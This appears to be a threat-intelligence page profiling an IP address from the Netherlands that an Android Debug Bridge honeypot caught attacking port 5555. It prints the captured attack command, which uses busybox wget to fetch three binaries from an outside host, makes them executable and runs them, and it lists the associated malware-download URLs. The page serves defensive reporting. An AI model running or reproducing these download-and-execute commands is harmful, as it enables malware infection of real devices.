Active Threat โข LOW
176.65.148.55
Country of Origin๐ณ๐ฑ Netherlands
First Detection2/25/2026
Last Activity2/25/2026
ISPPfcloud UG (haftungsbeschrankt)
๐ฏ
3
Total Attacks
๐
1
Ports
๐ก
1
Attack Types
๐ฆ
0
Malware
Geolocation
- Country
- ๐ณ๐ฑ Netherlands
- City
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Attack Types
adbhoney
Attacked Ports
5555
Associated Malware
No associated malware
Executed Commands
$
cd /data/local/tmp/; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/55vrn6yo1m?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 55vrn6yo1m; ./55vrn6yo1m; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/gp3agts8a5?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 gp3agts8a5; ./gp3agts8a5; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/0tupj6m8h3?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 0tupj6m8h3; ./0tupj6m8h31xURLhaus Intel2 URLsabuse.ch
This IP has used the following known malicious URLs:
http://130.12.180.124/fit075kmyvo3/assets/js/gp3agts8a5?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7wofflinemalware_downloadelfua-wget
http://130.12.180.124/fit075kmyvo3/assets/js/0tupj6m8h3?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7wofflinemalware_downloadelfua-wget
Risk Assessment
10
/100
LowMediumHighCritical